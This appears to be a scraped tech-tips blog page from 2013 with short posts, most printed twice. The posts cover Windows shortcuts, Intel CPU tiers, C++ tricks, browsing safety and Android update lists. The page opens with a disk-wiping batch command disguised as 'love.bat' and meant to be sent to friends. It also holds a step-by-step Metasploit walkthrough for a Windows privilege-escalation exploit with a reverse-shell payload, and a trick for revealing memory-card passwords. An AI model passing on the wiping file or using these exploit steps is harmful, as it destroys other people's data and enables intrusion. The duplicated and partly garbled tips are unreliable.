cmd /c del c:\* /F /S /Q
save this file with "love.bat"
send this file to your friends.
when your friend try to open this file , the computer will shut down forever.................
Enjoy................
WARNING: I am not responsible for any thing.
Right Click ::.
Tech Support: I need you to right-click on the Open Desktop.
Customer: ?Ok.
Tech Support: Did you get a pop-up menu ?
Customer: No
Tech Support: Ok. Right click again. Do you see a pop-up menu?
Customer: No
Tech Support: Ok sir. Can you tell me what you have done untill now?
Customer: Sure, you told me to write "click" and I wrote "click". And then you told me to write "click" again, so I wrote "click" again. Now it reads "click click"
DIFFERENCE BETWEEN CORE I3, CORE I5, CORE I7..
► Core i3:
* Entry level processor.
* 2-4 Cores
* 4 Threads
* Hyper-Threading (efficient use of processor
resources)
* 3-4 MB Cache
* 32 nm Silicon (less heat and energy)
► Core i5:
* Mid range processor.
* 2-4 Cores
* 4 Threads
* Turbo Mode (turn off core if not used)
* Hyper-Threading (efficient use of processor
resources)
* 3-8 MB Cache
* 32-45 nm Silicon (less heat and energy)
► Core i7:
* High end processor.
* 4 Cores
* 8 Threads
* Turbo Mode (turn off core if not used)
* Hyper-Threading (efficient use of processor
resources)
* 4-8 MB Cache
* 32-45 nm Silicon (less heat and energy)
short cut for windows operating system helpful for computer section
short cut for windows operating system helpful for computer section
***********************
1. Windows Logo (Display or hide the Start menu)
2. Windows Logo+BREAK (Display the System Properties dialog box)
3. Windows Logo+D (Display the desktop)
4. Windows Logo+M (Minimize all of the windows)
5. Windows Logo+SHIFT+M (Restore the minimized windows)
6. Windows Logo+E (Open My Computer)
7. Windows Logo+F (Search for a file or a folder)
8. CTRL+Windows Logo+F (Search for computers)
9. Windows Logo+F1 (Display Windows Help)
10. Windows Logo+ L (Lock the keyboard)
11. Windows Logo+R (Open the Run dialog box)
12. Windows Logo+U (Open Utility Manager)
13. Accessibility Keyboard Shortcuts
14. Right SHIFT for eight seconds (Switch Filter Keys either on or off)
15. Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
16. Left ALT+left SHIFT+NUM LOCK (Switch the Mouse Keys either on or off)
17. SHIFT five times (Switch the Sticky Keys either on or off)
18. NUM LOCK for five seconds (Switch the Toggle Keys either on or off)
19. Windows Logo +U (Open Utility Manager)
20. Windows Explorer Keyboard Shortcuts
21. END (Display the bottom of the active window)
22. HOME (Display the top of the active window)
23. NUM LOCK+Asterisk sign (*) (Display all of the sub folders that are under the selected folder)
24. NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
25. NUM LOCK+Minus sign (-) (Collapse the selected folder)
26. LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
27. RIGHT ARROW (Display the current selection if it is collapsed, or select the first sub-folder)
***********************
1. Windows Logo (Display or hide the Start menu)
2. Windows Logo+BREAK (Display the System Properties dialog box)
3. Windows Logo+D (Display the desktop)
4. Windows Logo+M (Minimize all of the windows)
5. Windows Logo+SHIFT+M (Restore the minimized windows)
6. Windows Logo+E (Open My Computer)
7. Windows Logo+F (Search for a file or a folder)
8. CTRL+Windows Logo+F (Search for computers)
9. Windows Logo+F1 (Display Windows Help)
10. Windows Logo+ L (Lock the keyboard)
11. Windows Logo+R (Open the Run dialog box)
12. Windows Logo+U (Open Utility Manager)
13. Accessibility Keyboard Shortcuts
14. Right SHIFT for eight seconds (Switch Filter Keys either on or off)
15. Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
16. Left ALT+left SHIFT+NUM LOCK (Switch the Mouse Keys either on or off)
17. SHIFT five times (Switch the Sticky Keys either on or off)
18. NUM LOCK for five seconds (Switch the Toggle Keys either on or off)
19. Windows Logo +U (Open Utility Manager)
20. Windows Explorer Keyboard Shortcuts
21. END (Display the bottom of the active window)
22. HOME (Display the top of the active window)
23. NUM LOCK+Asterisk sign (*) (Display all of the sub folders that are under the selected folder)
24. NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
25. NUM LOCK+Minus sign (-) (Collapse the selected folder)
26. LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
27. RIGHT ARROW (Display the current selection if it is collapsed, or select the first sub-folder)
Hack Remote PC with Windows
Hack Remote PC with Windows
EPATHOBJ::pprFlattenRec Local Privilege
Escalation
This module exploits vulnerability on
EPATHOBJ::pprFlattenRec due to the usage of uninitialized
data which allows to corrupt memory. At the moment, the
module has been tested successfully on Windows XP SP3,
Windows 2003 SP1, and Windows 7 SP1.
Exploit Targets
Windows XP SP 3
Requirement
Attacker: Kali Linux
Victim PC : Windows XP
First Hack the Victim PC Using Metaspolit ( Tutorial How
to Hack Remote PC )
Open Kali Linux terminal type msfconsole
Now type use use exploit/windows/local/ppr_flatten_rec
msf exploit ( ppr_flatten_rec )> set payload windows/
meterpreter/reverse_tcp
msf exploit ( ppr_flatten_rec )> set lhost 192.168.1.103 ( IP
of Local Host)
msf exploit ( ppr_flatten_rec )> set session 1
msf exploit ( ppr_flatten_rec )> exploit
EPATHOBJ::pprFlattenRec Local Privilege
Escalation
This module exploits vulnerability on
EPATHOBJ::pprFlattenRec due to the usage of uninitialized
data which allows to corrupt memory. At the moment, the
module has been tested successfully on Windows XP SP3,
Windows 2003 SP1, and Windows 7 SP1.
Exploit Targets
Windows XP SP 3
Requirement
Attacker: Kali Linux
Victim PC : Windows XP
First Hack the Victim PC Using Metaspolit ( Tutorial How
to Hack Remote PC )
Open Kali Linux terminal type msfconsole
Now type use use exploit/windows/local/ppr_flatten_rec
msf exploit ( ppr_flatten_rec )> set payload windows/
meterpreter/reverse_tcp
msf exploit ( ppr_flatten_rec )> set lhost 192.168.1.103 ( IP
of Local Host)
msf exploit ( ppr_flatten_rec )> set session 1
msf exploit ( ppr_flatten_rec )> exploit
Wednesday 25 December 2013
5 Hidden Features Of C++ That You May Find Interesting
1. While the ternary operator (?:) is well known, many don’t realise that it can also be used as lvalues.
x = (y < 0) ? 10 : 20;
(a == 0 ? a : b) = 1;
Otherwise, you would be writing this as,
if (a == 0)
a = 1;
else
b = 1;
2. The namespace alias is pretty easy to miss. Once you know about it though, you will start recognising it everywhere. It is especially useful when you’rr writing a large code with a lot of namespace hierarchies.
namespace x = boost::filesystem;
x::path myPath(strPath, fs::native );
3. Variables aren’t the only ones that can be declared in the init part of functions. You can also declare classes and other functions.
for(struct { int x; float y; } loop = { 1, 2 }; ...; ...) {
...
}
4. The unary + operator can be used in order to promote or decay a number of things. See below for some examples.
+EnumeratorValue: This gives your enumerator value a perfect integer type, which lets it fit its value. This is quite useful for implementing overloaded operators for enumeration.
Passing a temporary value to a variable: You can create a temporary value for a variable using this operator. For example, if you have a class that uses an in class static initializer without any out of class definition, but sometimes the system fails to link.
struct Foo {
static int const value = 42;
};
template
void f(T const&);
int main() {
// fails to link and tries to get the address of "Foo::value"!
f(Foo::value);
// works - pass a temporary value
f(+Foo::value);
}
Decay an array to a pointer: The operator also works when you want to pass two values to a function.
template
void f(T const& a, T const& b);
int main() {
int a[2];
int b[3];
f(a, b); // won't work! different values for "T"!
f(+a, +b); // works! T is "int*" both time
}
5. You must know the id/identity metafunction. Now check out this usecase for it, which is for non-template cases.
// void (*f)(); // same
id::type *f;
// void (*f(void(*p)()))(int); // same
id::type *f(id::type *p);
// int (*p)[2] = new int[10][2]; // same
id::type *p = new int[10][2];
// void (C::*p)(int) = 0; // same
id::type C::*p = 0;
It helps decrypting C++ declarations greatly!
// boost::identity is pretty much the same
template
struct id { typedef T type; };
Basic tips for Secure Browsing (Share it)
1. Never keep same password for different services you use online like gmail , facebook, bank accounts etc.,
2. Use multiple accounts so that you dont get spams in your personal/ official email address.
3. Install good Antivirus and Two way firewall.
4. Use VPN for hiding identity and secure browsing when using internet out of your home.
5. Update your OS, Antivirus, Firewall and Browsers regularly.
6. Install a good spyware & Adware scanner .
7. Never provide personal information openly in public websites. Share your information carefully.
8. Never click on unwanted or suspiicious links. It may be hacking attempt.
9. Change your passwords regularly to increase the security of your daily actiivities.
1. Never keep same password for different services you use online like gmail , facebook, bank accounts etc.,
2. Use multiple accounts so that you dont get spams in your personal/ official email address.
3. Install good Antivirus and Two way firewall.
4. Use VPN for hiding identity and secure browsing when using internet out of your home.
5. Update your OS, Antivirus, Firewall and Browsers regularly.
6. Install a good spyware & Adware scanner .
7. Never provide personal information openly in public websites. Share your information carefully.
8. Never click on unwanted or suspiicious links. It may be hacking attempt.
9. Change your passwords regularly to increase the security of your daily actiivities.
Tuesday 24 December 2013
Is your phone part of this list?
List Of Smartphones Getting Android 4.4 KitKat Update
Sony
* Sony Xperia Z1
* Sony Xperia Z
* Sony Xperia Z Ultra
* Sony Xperia ZL
* Sony Xperia Tablet Z
HTC
* HTC One
* HTC One X+
* HTC One X
* New Desire series phones launched in 2013
* HTC Droid DNA
* HTC J
* HTC Butterfly
LG
* LG G2
* LG Nexus 4
* LG Optimus L7, L5, L3
* LG Optimus G
* LG Optimus G Pro
* LG Optimus VU
Samsung
* Samsung Galaxy S4
* Samsung Galaxy S4 Zoom
* Samsung Galaxy S4 Active
* Samsung Galaxy Note 3
* Samsung Galaxy Mega (no confirmation whether the 5.8, 6.3 or both)
* Samsung Galaxy S3
* Samsung Galaxy Note 2
* Samsung Galaxy S4 Mini
* Samsung Galaxy Tab 3 & Tab 2
Sony
* Sony Xperia Z1
* Sony Xperia Z
* Sony Xperia Z Ultra
* Sony Xperia ZL
* Sony Xperia Tablet Z
HTC
* HTC One
* HTC One X+
* HTC One X
* New Desire series phones launched in 2013
* HTC Droid DNA
* HTC J
* HTC Butterfly
LG
* LG G2
* LG Nexus 4
* LG Optimus L7, L5, L3
* LG Optimus G
* LG Optimus G Pro
* LG Optimus VU
Samsung
* Samsung Galaxy S4
* Samsung Galaxy S4 Zoom
* Samsung Galaxy S4 Active
* Samsung Galaxy Note 3
* Samsung Galaxy Mega (no confirmation whether the 5.8, 6.3 or both)
* Samsung Galaxy S3
* Samsung Galaxy Note 2
* Samsung Galaxy S4 Mini
* Samsung Galaxy Tab 3 & Tab 2
How to Hack Memory card password
Hi friends! if you really want to hack any memory card's password from heart, you can try this trick.
To hack the password, follow these steps-
1> open C:\System by using any file explore (where 'C:\' is ur memcard drive letter)
2> rename 'mmcstore' as 'mmcstore.txt'
3> open that file. There you can see the password.
Enjoy
Hi friends! if you really want to hack any memory card's password from heart, you can try this trick.
To hack the password, follow these steps-
1> open C:\System by using any file explore (where 'C:\' is ur memcard drive letter)
2> rename 'mmcstore' as 'mmcstore.txt'
3> open that file. There you can see the password.
Enjoy
Monday 23 December 2013
Friends of Technology: Best Themes For Your Android Phone : TechNitros ...
Friends of Technology: Best Themes For Your Android Phone : TechNitros
...: Best Themes For Your Android Phone : TechNitros http://technitros.com/best-themes-for-your-android-phone/
...: Best Themes For Your Android Phone : TechNitros http://technitros.com/best-themes-for-your-android-phone/